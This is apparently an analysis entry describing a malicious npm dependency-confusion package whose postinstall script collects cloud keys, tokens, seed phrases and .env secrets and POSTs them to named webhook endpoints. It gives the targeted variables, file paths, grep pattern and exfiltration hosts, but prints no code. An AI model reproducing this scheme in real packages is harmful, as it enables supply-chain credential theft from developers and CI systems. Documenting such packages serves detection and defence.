Package is published as version 99.99.99 to win private-vs-public resolution against an internal cryptodao-contracts namespace. The package's main module is a one-line stub; the real payload runs from the postinstall script recon.js. On npm install, recon.js enumerates a hardcoded list of installer-side secret environment variables (AWS_SECRET_ACCESS_KEY, SSH_PRIVATE_KEY, NPM_TOKEN, GITLAB_ACCESS_TOKEN, MNEMONIC, SEED_PHRASE, PRIVATE_KEY, DB_PASSWORD, etc.), reads .env files from installer-owned paths (/root/.env, /app/.env, .env.production), and grep-extracts lines matching KEY|SECRET|TOKEN|PASS|PRIVATE|MNEMONIC. The collected secrets, hostname, user, cwd, and CI build-directory listings are POSTed over HTTPS to two attacker-controlled endpoints, webhook.site/d6d18927-e513-4df7-b019-58bfc64fe0dd and enqoojbegdvxj.x.pipedream.net, with TLS verification disabled (rejectUnauthorized: false). Self-described in source as a 'CryptoDAO Dependency Confusion Reconnaissance Payload'.